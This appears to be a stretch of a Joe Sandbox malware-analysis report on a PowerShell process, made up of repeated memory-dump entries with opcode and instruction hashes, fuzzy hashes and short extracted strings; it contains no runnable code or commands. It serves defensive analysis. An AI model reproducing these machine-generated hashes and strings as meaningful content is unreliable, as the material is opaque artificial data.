                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e0366137a619afd0ee484856836ec87cfdfbe93f8bc8572fd77cd9099a95aa3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b500cd8ba59f3474f97418c12f3aa70616884365c9b50ed65a42904a3266e1e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0F976200600AF9720CF0ADD85C23FBAEEBD4770719C5AAE84A4B611C671FC51CEA0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c6bb2af7043c0903ad8170da00508cd42a64bf15f6c57c25c23c9d306a91706f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2b5e49d20e04242665d5da063eed59c0259af8ba81fdb309c8d9a7f56ca89f46
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6bb2af7043c0903ad8170da00508cd42a64bf15f6c57c25c23c9d306a91706f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF05E353052519FC711CB1CE454866BBF6AFCA31532950AFE545DF7B2DA22DC028750
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 433fef3d48acf246c57cd1937d30b9a64baf404963167bbd6a367b20ac4019b0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 39a07dcdfbcf06dd4b6438df6bbf03304eb0290e16522b2d506b29a2b5f6353a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 433fef3d48acf246c57cd1937d30b9a64baf404963167bbd6a367b20ac4019b0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43F01D79100640AFD725CF06CD85D23BBBAEBC9764B298599E84A5B712C731FC42CFA0
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: c0d8b05294dc86adfedb7d4bb85fcc7777f9a52a71717850ccd10737f105035f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 363ba0fe3ea94003f8edf7333047d83e72a868bb10244d19ae8926bf73116b24
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0d8b05294dc86adfedb7d4bb85fcc7777f9a52a71717850ccd10737f105035f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F0A7323007149FDB10AB6AE84496FBBE9EBC8275B00052DE50AD3340DF31EC4587A4
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 633d034425dc3326c37f79109591345e31f50b88a6fb16854c9079a80783a808
                                                                                                                                                                                                                                                                                                                • Instruction ID: d995a1c8f71c45f669d59d094f36964ffc7fa6e28cbf8b9d9a063a0af23056b1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 633d034425dc3326c37f79109591345e31f50b88a6fb16854c9079a80783a808
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0E5316456951F8712922D7C148BFBFEADEC617130441AEE049DB651CE16EC068BA1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ae8fc134e7099d02c657db2e3946ff5cd913e45c4143fb2fa92ae7285a01ca5e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 09780e7f016958c5dc5b45bc2adcc3e9d120246518f6430dd19d3a9faac45872
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae8fc134e7099d02c657db2e3946ff5cd913e45c4143fb2fa92ae7285a01ca5e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF0A03A350204CFCF10EF6D9900A9ABBE2EBC8255B058569E909CB365DA34EC058BA1
Memory Dump Source
• Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d72c3e962514f3b460b2232d61cc0088b8a9bf1f27d2636b044061e2f3e6e55
                                                                                                                                                                                                                                                                                                                • Instruction ID: 134c0efd2936ceeb270bc2dcb5824b14b2dc112ce0fb99e317b1e2ca8fdcdba7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d72c3e962514f3b460b2232d61cc0088b8a9bf1f27d2636b044061e2f3e6e55
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E02635304A104BCF097775A40C2AE7A96EBC4768F04002ED60A83381CF782C0697D6
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 33bfc1d16a419a4e3a88f2f80864d62880a44e38e88b03530a40da6f2bc0a20c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 22da5c4bd7511f6e4eed9dad479b47c0f034a9ebc8924dcb5b3a3a965ff28f06
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33bfc1d16a419a4e3a88f2f80864d62880a44e38e88b03530a40da6f2bc0a20c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6D05E5276112527AE9836BA180067BA5CF9BC64AE70510BAAA08C73D2ED50EC0543F2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                • Instruction ID: 076db25f3704b32b01eb65450a187bf0def744e77887cd93108ad0966df09207
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE08631B0401497CB0899ADD8118D9F7A6DBCC220F04847AD91AA7380DA326D168691
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 95039a97cc69886c9be1eae8cf393197b94ab10b8da99e57c300cee60b87eb7f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6d84668a17d4b8a395db572930f44bc591b975a02b85cb0028e70530b931c0f7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95039a97cc69886c9be1eae8cf393197b94ab10b8da99e57c300cee60b87eb7f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE0C231700A250B8621A66EAC1089FB7DBDFC86B5310403EE01DC7750DE60EC058BE5
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ca7291cc8e0612854abb9b67216530af2043bcc5ff83b135439ae761214e8888
                                                                                                                                                                                                                                                                                                                • Instruction ID: c5aa0fb69927ac9a2846ba2598b621175396bbc11be72f5a7e789ef76d0c6452
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7291cc8e0612854abb9b67216530af2043bcc5ff83b135439ae761214e8888
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE0483598D28A8FCB05DB78F44A4BEBFF0EF06260F04419ED945ABA52D63118D5DF81
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: eb2f3f31fd1fc39ebecc4bf2005e2c31babd138fbe279d930f0bd17e782cc9c0
                                                                                                                                                                                                                                                                                                                • Instruction ID: d37d218530a6a807b57907fdf7b3a54c44242aa7ca0d69615f939be60db763e1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb2f3f31fd1fc39ebecc4bf2005e2c31babd138fbe279d930f0bd17e782cc9c0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E01A319491898BCF09EBA4F41A8FD7F70EE05215F04009DD99696192EB21098ACFC1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 50e4ebf643387ad11c222cd2fe595c7bcbb1db4bb748461307c0ebbd12ff637e
                                                                                                                                                                                                                                                                                                                • Instruction ID: a91802d64ca9c946d77661f4beb47a5c34b2a7580f2fa7f8d32890b4a8b9530d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50e4ebf643387ad11c222cd2fe595c7bcbb1db4bb748461307c0ebbd12ff637e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E01A70E4414A9E8B80EFBCC4415A9FFF0EB49200B2589AEC949D7302E2328A11CB81
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 740265b64fe48ab082cdc763deaab140d7696f2391b6748245e9a2ad9fb6f93c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D062B0D042099F8780DFADC94156DFBF4EF48204F5085BA8919D7351F7319A128BD1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: f5aec26f9927e2ca402ea7b2b87a8d99b716e2703ab098cb668e068a02bfaccf
                                                                                                                                                                                                                                                                                                                • Instruction ID: b121b0f3fb128bc91ff27746f1fdb074931ea31b526e2564479c1b386cf79981
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5aec26f9927e2ca402ea7b2b87a8d99b716e2703ab098cb668e068a02bfaccf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D067319045098FCF08EBA5E85A4BDBB74FB14301F40416DD91792191EF312A5ADEC5
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 896bce8d218155512521ceb3a9655a64e1b2114d5e48eb6949db9a47a2a5b9a5
                                                                                                                                                                                                                                                                                                                • Instruction ID: bdfe633b5e08f6a66432a18a73e9c2e28f345596ebfa22fe835a44275fa6925f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 896bce8d218155512521ceb3a9655a64e1b2114d5e48eb6949db9a47a2a5b9a5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D01734A0820A8FCB08EFA4E44687EBBB5EB45200F008169DD0A93390EA306C05DFC1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 775ced1e8a7e410ca2040cdefb2bd9404161d63c685c561a6cbb9d699895e355
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d908e52682ce5147946ea3fc6ff98ac5b26901d0db4ae67fc2648d3ebf234cf
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 775ced1e8a7e410ca2040cdefb2bd9404161d63c685c561a6cbb9d699895e355
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19C0122158E3D00EDF03933848496053FB02E6322930840DAD2828F16288A88804C762
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4818e3c994f32cec4ae9abd05f9b83545934aaa2b4e669e17e139cd18f56c1b7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 14dce2192b9247ffc37a101850e88d70c6c2d78fd17466700b20a0c4ee903414
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4818e3c994f32cec4ae9abd05f9b83545934aaa2b4e669e17e139cd18f56c1b7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDC08C30004309DF86483FB59044824332AFE8022974085ACE06A162939F22E980CA88
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7cb51d6ea47c25bec1a3f0b83861a847862f900ba5791acfadd2f6a191c7f9cf
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b001965dd7d1427c735a0c8bd0bc4ba78560d65c50244c47c12b4e8ca8f6f74
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb51d6ea47c25bec1a3f0b83861a847862f900ba5791acfadd2f6a191c7f9cf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47B092300497099FC2887F79A4448147329FE4522978004ECE54E0B2939F36E881CA59
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: $cMi$4']q$4']q$4']q$4']q$84Xj$84Xj$pi"i$tP]q$tP]q$J[j$J[j$J[j$J[j$J[j$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3604267704
                                                                                                                                                                                                                                                                                                                • Opcode ID: bcd1e38e37bc361c22d89d63c58f872fce673fe670b4ed9d2f1c283705ee4c30
                                                                                                                                                                                                                                                                                                                • Instruction ID: a6d98496e5be32395065a4ae0fce819dcfcd29b6a95e084f0f3f576b42e530ab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcd1e38e37bc361c22d89d63c58f872fce673fe670b4ed9d2f1c283705ee4c30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD137B1B4421A8FCF24DB6898006AABBFAAFC5214F14C47FD545CB256DB31D885C7A3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: pi"i$pi"i$J[j$J[j$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-941437480
                                                                                                                                                                                                                                                                                                                • Opcode ID: bff3a22ae2346e73db704193fbcd3e5bfe2ad72bf22e5e799348531a83928004
                                                                                                                                                                                                                                                                                                                • Instruction ID: 996f9175e2793eb2af3c8dc2519f782df8fea5476094627a9c4d5d1fde35bb5d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bff3a22ae2346e73db704193fbcd3e5bfe2ad72bf22e5e799348531a83928004
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E41E3F15083969FCF22CF2984507A6BBF9BB46228F1984AFD4548F152C738D884C7A3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: TcMi$lcMi$J[j$J[j$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-807173668
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4daa67e19864c445e579027a467db84c7761cbbe0deb8c4db352a9fb6761ebad
                                                                                                                                                                                                                                                                                                                • Instruction ID: c16b915a82d5072549cbdd122281b52c9a998f2b5533a386024a247684121dd3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4daa67e19864c445e579027a467db84c7761cbbe0deb8c4db352a9fb6761ebad
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21F7A164D3D15FC72787285820A627FB96F97214B0A85DFD080CF697C9349C89C3B3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: tMZj$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1118251408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28ac8929aec83066e8a422156489d2827987420200a8b7cf6d637f894f72b040
                                                                                                                                                                                                                                                                                                                • Instruction ID: 986ae0530ef7ea9aa749b087fdbacd8987b3a858ba6dfc47efa07f2f94bc3062
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ac8929aec83066e8a422156489d2827987420200a8b7cf6d637f894f72b040
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15B1A374E002099FDB54DFA9D590A9EFBF2FF88304F109629D819AB355DB30A949CF90
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: tMZj$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1118251408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b418e7fe2309a2be6b818e949695117786883c4b8b219c86939ac15d3f6bd43
                                                                                                                                                                                                                                                                                                                • Instruction ID: 70581828fc2e684d1209c22f5d95f2afef4b1204b8c70a2bb5e93df35345e72a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b418e7fe2309a2be6b818e949695117786883c4b8b219c86939ac15d3f6bd43
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DB19474E002099FDB54DFA9D590A9EFBF2FF88304F109629D819AB355DB30A945CF90
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: fbq$4']q$4']q$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1065903908
                                                                                                                                                                                                                                                                                                                • Opcode ID: c83330478316e452c3f083d926d1e9bce57442efdcbd7998a7e359e9dbe45b96
                                                                                                                                                                                                                                                                                                                • Instruction ID: 031c2d6d0c048b6e1eb2a907b2be76f49fd7525d92c869cc165f59836720079e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c83330478316e452c3f083d926d1e9bce57442efdcbd7998a7e359e9dbe45b96
